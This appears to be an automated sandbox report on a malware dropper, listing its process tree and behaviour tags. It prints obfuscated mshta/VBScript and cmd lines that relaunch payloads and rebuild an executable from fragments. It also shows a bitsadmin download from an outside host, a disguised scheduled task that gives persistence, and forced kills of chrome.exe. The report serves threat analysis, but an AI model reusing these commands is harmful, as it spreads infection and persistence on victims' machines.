1336 Fri051e1e7444.exe 6RfiwzZkIPJvopWxqd4ouGmM.exe PID 1336 wrote to memory of 2332 1336 Fri051e1e7444.exe 6RfiwzZkIPJvopWxqd4ouGmM.exe PID 1336 wrote to memory of 2332 1336 Fri051e1e7444.exe 6RfiwzZkIPJvopWxqd4ouGmM.exe PID 1336 wrote to memory of 1268 1336 Fri051e1e7444.exe ZKiBxX_lZY4IIzpkXK7L8Xle.exe PID 1336 wrote to memory of 1268 1336 Fri051e1e7444.exe ZKiBxX_lZY4IIzpkXK7L8Xle.exe PID 1336 wrote to memory of 1268 1336 Fri051e1e7444.exe ZKiBxX_lZY4IIzpkXK7L8Xle.exe PID 1336 wrote to memory of 2388 1336 Fri051e1e7444.exe OwrOZbTk9HrZsEFTj0c7paTs.exe PID 1336 wrote to memory of 2388 1336 Fri051e1e7444.exe OwrOZbTk9HrZsEFTj0c7paTs.exe PID 1336 wrote to memory of 2280 1336 Fri051e1e7444.exe 3fQcxDlp43cF_Lkgp2hF3etw.exe PID 1336 wrote to memory of 2280 1336 Fri051e1e7444.exe 3fQcxDlp43cF_Lkgp2hF3etw.exe PID 1336 wrote to memory of 2280 1336 Fri051e1e7444.exe 3fQcxDlp43cF_Lkgp2hF3etw.exe PID 1336 wrote to memory of 3260 1336 Fri051e1e7444.exe zt3fotSIgq8mlNObpN9zV4Ri.exe PID 1336 wrote to memory of 3260 1336 Fri051e1e7444.exe zt3fotSIgq8mlNObpN9zV4Ri.exe PID 1336 wrote to memory of 3260 1336 Fri051e1e7444.exe zt3fotSIgq8mlNObpN9zV4Ri.exe PID 1336 wrote to memory of 2080 1336 Fri051e1e7444.exe E8SL1DWYDQfbr15Eley5KWls.exe PID 1336 wrote to memory of 2080 1336 Fri051e1e7444.exe E8SL1DWYDQfbr15Eley5KWls.exe PID 1336 wrote to memory of 2080 1336 Fri051e1e7444.exe E8SL1DWYDQfbr15Eley5KWls.exe PID 1336 wrote to memory of 2328 1336 Fri051e1e7444.exe Uv2OLZQGQUISQFphMrVjFyks.exe PID 1336 wrote to memory of 2328 1336 Fri051e1e7444.exe Uv2OLZQGQUISQFphMrVjFyks.exe PID 1336 wrote to memory of 3044 1336 Fri051e1e7444.exe I5ybN5GcFFp2qz4bO557reWX.exe PID 1336 wrote to memory of 3044 1336 Fri051e1e7444.exe I5ybN5GcFFp2qz4bO557reWX.exe PID 1336 wrote to memory of 3044 1336 Fri051e1e7444.exe I5ybN5GcFFp2qz4bO557reWX.exe PID 1336 wrote to memory of 1844 1336 Fri051e1e7444.exe 07110_23KBD6OrY29SHSSWf2.exe PID 1336 wrote to memory of 1844 1336 Fri051e1e7444.exe 07110_23KBD6OrY29SHSSWf2.exe PID 1336 wrote to memory of 3804 1336 Fri051e1e7444.exe m4B4l9UNQFjYJy2qOZ8ywGcq.exe PID 1336 wrote to memory of 3804 1336 Fri051e1e7444.exe m4B4l9UNQFjYJy2qOZ8ywGcq.exe PID 1336 wrote to memory of 3804 1336 Fri051e1e7444.exe m4B4l9UNQFjYJy2qOZ8ywGcq.exe PID 1336 wrote to memory of 404 1336 Fri051e1e7444.exe E7hLWHgMHAmG2ptzTZk60djt.exe PID 1336 wrote to memory of 404 1336 Fri051e1e7444.exe E7hLWHgMHAmG2ptzTZk60djt.exe PID 1336 wrote to memory of 404 1336 Fri051e1e7444.exe E7hLWHgMHAmG2ptzTZk60djt.exe PID 1336 wrote to memory of 2360 1336 Fri051e1e7444.exe uIhpaXRSRc02XMvQzI27rw3i.exe PID 1336 wrote to memory of 2360 1336 Fri051e1e7444.exe uIhpaXRSRc02XMvQzI27rw3i.exe PID 1336 wrote to memory of 2360 1336 Fri051e1e7444.exe uIhpaXRSRc02XMvQzI27rw3i.exe PID 1336 wrote to memory of 2096 1336 Fri051e1e7444.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 1336 wrote to memory of 2096 1336 Fri051e1e7444.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 1336 wrote to memory of 2096 1336 Fri051e1e7444.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 1336 wrote to memory of 3584 1336 Fri051e1e7444.exe YTDtEif11P99NgeKwT6fC4ch.exe PID 1336 wrote to memory of 3584 1336 Fri051e1e7444.exe YTDtEif11P99NgeKwT6fC4ch.exe PID 1336 wrote to memory of 432 1336 Fri051e1e7444.exe e4XxYUrzhL2kFffGJzG8cKA3.exe PID 1336 wrote to memory of 432 1336 Fri051e1e7444.exe e4XxYUrzhL2kFffGJzG8cKA3.exe PID 1336 wrote to memory of 432 1336 Fri051e1e7444.exe e4XxYUrzhL2kFffGJzG8cKA3.exe PID 1336 wrote to memory of 1008 1336 Fri051e1e7444.exe CQ4wIy1JUrHTND_rGM2Jhn8d.exe PID 1336 wrote to memory of 1008 1336 Fri051e1e7444.exe CQ4wIy1JUrHTND_rGM2Jhn8d.exe PID 1336 wrote to memory of 1008 1336 Fri051e1e7444.exe CQ4wIy1JUrHTND_rGM2Jhn8d.exe PID 2096 wrote to memory of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 2096 wrote to memory of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 2096 wrote to memory of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 1336 wrote to memory of 2140 1336 Fri051e1e7444.exe S8LGJghE7EKxPiR6DNQktZgV.exe PID 1336 wrote to memory of 2140 1336 Fri051e1e7444.exe S8LGJghE7EKxPiR6DNQktZgV.exe PID 1336 wrote to memory of 2140 1336 Fri051e1e7444.exe S8LGJghE7EKxPiR6DNQktZgV.exe PID 2328 wrote to memory of 1700 2328 Uv2OLZQGQUISQFphMrVjFyks.exe cmd.exe PID 2328 wrote to memory of 1700 2328 Uv2OLZQGQUISQFphMrVjFyks.exe cmd.exe PID 2096 wrote to memory of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 2096 wrote to memory of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 2096 wrote to memory of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 2360 wrote to memory of 4020 2360 uIhpaXRSRc02XMvQzI27rw3i.exe uIhpaXRSRc02XMvQzI27rw3i.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\bfusvrrC:\Users\Admin\AppData\Roaming\bfusvrr2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr2⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\uiusvrrC:\Users\Admin\AppData\Roaming\uiusvrr2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\uiusvrrC:\Users\Admin\AppData\Roaming\uiusvrr2⤵
-
C:\Users\Admin\AppData\Roaming\bfusvrrC:\Users\Admin\AppData\Roaming\bfusvrr2⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr2⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task2⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task3⤵
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task2⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr2⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr3⤵
-
C:\Users\Admin\AppData\Roaming\bfusvrrC:\Users\Admin\AppData\Roaming\bfusvrr2⤵
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task2⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task2⤵
-
C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exeC:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task3⤵
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr2⤵
-
C:\Users\Admin\AppData\Roaming\bwusvrrC:\Users\Admin\AppData\Roaming\bwusvrr3⤵
-
C:\Users\Admin\AppData\Roaming\bfusvrrC:\Users\Admin\AppData\Roaming\bfusvrr2⤵
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\gckOBeKwEc_9Tb1WLDr_o55o.exe"C:\Users\Admin\Pictures\Adobe Films\gckOBeKwEc_9Tb1WLDr_o55o.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\6RfiwzZkIPJvopWxqd4ouGmM.exe"C:\Users\Admin\Pictures\Adobe Films\6RfiwzZkIPJvopWxqd4ouGmM.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\OwrOZbTk9HrZsEFTj0c7paTs.exe"C:\Users\Admin\Pictures\Adobe Films\OwrOZbTk9HrZsEFTj0c7paTs.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZKiBxX_lZY4IIzpkXK7L8Xle.exe"C:\Users\Admin\Pictures\Adobe Films\ZKiBxX_lZY4IIzpkXK7L8Xle.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ADP8vL2SLdGPH8L7FyA9nk0u.exe"C:\Users\Admin\Pictures\Adobe Films\ADP8vL2SLdGPH8L7FyA9nk0u.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 10803⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\NpQFFR5PLBhAmQZ0HxCbwNxm.exe"C:\Users\Admin\Pictures\Adobe Films\NpQFFR5PLBhAmQZ0HxCbwNxm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 8963⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "E8SL1DWYDQfbr15Eley5KWls.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\zt3fotSIgq8mlNObpN9zV4Ri.exe"C:\Users\Admin\Pictures\Adobe Films\zt3fotSIgq8mlNObpN9zV4Ri.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\1NfON6dm6F_QWOrKdYH7I84U.exe"C:\Users\Admin\Documents\1NfON6dm6F_QWOrKdYH7I84U.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\nksQBGgk4aKK7MdTUg8YET4X.exe"C:\Users\Admin\Pictures\Adobe Films\nksQBGgk4aKK7MdTUg8YET4X.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\HpQtObz62dT6szj1j12odrbQ.exe"C:\Users\Admin\Pictures\Adobe Films\HpQtObz62dT6szj1j12odrbQ.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\uWM88AHiVsIghHqLufZXuMxT.exe"C:\Users\Admin\Pictures\Adobe Films\uWM88AHiVsIghHqLufZXuMxT.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\KUuRjtWwC9mcEybDnxKPC2fz.exe"C:\Users\Admin\Pictures\Adobe Films\KUuRjtWwC9mcEybDnxKPC2fz.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\hfRWQcdalGPlSdecGjYWgh99.exe"C:\Users\Admin\Pictures\Adobe Films\hfRWQcdalGPlSdecGjYWgh99.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-R4J9A.tmp\hfRWQcdalGPlSdecGjYWgh99.tmp"C:\Users\Admin\AppData\Local\Temp\is-R4J9A.tmp\hfRWQcdalGPlSdecGjYWgh99.tmp" /SL5="$202AC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\hfRWQcdalGPlSdecGjYWgh99.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-C0JLV.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-C0JLV.tmp\DYbALA.exe" /S /UID=27096⤵
-
C:\Program Files\7-Zip\MIDBCRSQAA\foldershare.exe"C:\Program Files\7-Zip\MIDBCRSQAA\foldershare.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\81-435e9-5e4-4faae-779d13af068e1\Nyshylamoqo.exe"C:\Users\Admin\AppData\Local\Temp\81-435e9-5e4-4faae-779d13af068e1\Nyshylamoqo.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 22008⤵
-
C:\Users\Admin\AppData\Local\Temp\97-3e64a-dcf-5769a-33453d0b0524b\Lotatiqama.exe"C:\Users\Admin\AppData\Local\Temp\97-3e64a-dcf-5769a-33453d0b0524b\Lotatiqama.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kt5q2ku5.ax4\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\kt5q2ku5.ax4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kt5q2ku5.ax4\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prqjttuq.5td\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\prqjttuq.5td\installer.exeC:\Users\Admin\AppData\Local\Temp\prqjttuq.5td\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jc5d4ki.aad\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5jc5d4ki.aad\any.exeC:\Users\Admin\AppData\Local\Temp\5jc5d4ki.aad\any.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hkf2oki.el3\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4hkf2oki.el3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\4hkf2oki.el3\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jll3pen3.x3h\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\jll3pen3.x3h\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\jll3pen3.x3h\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr4DF3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\1HpT7fOCjRqwevyYF3NF9uzi.exe"C:\Users\Admin\Pictures\Adobe Films\1HpT7fOCjRqwevyYF3NF9uzi.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
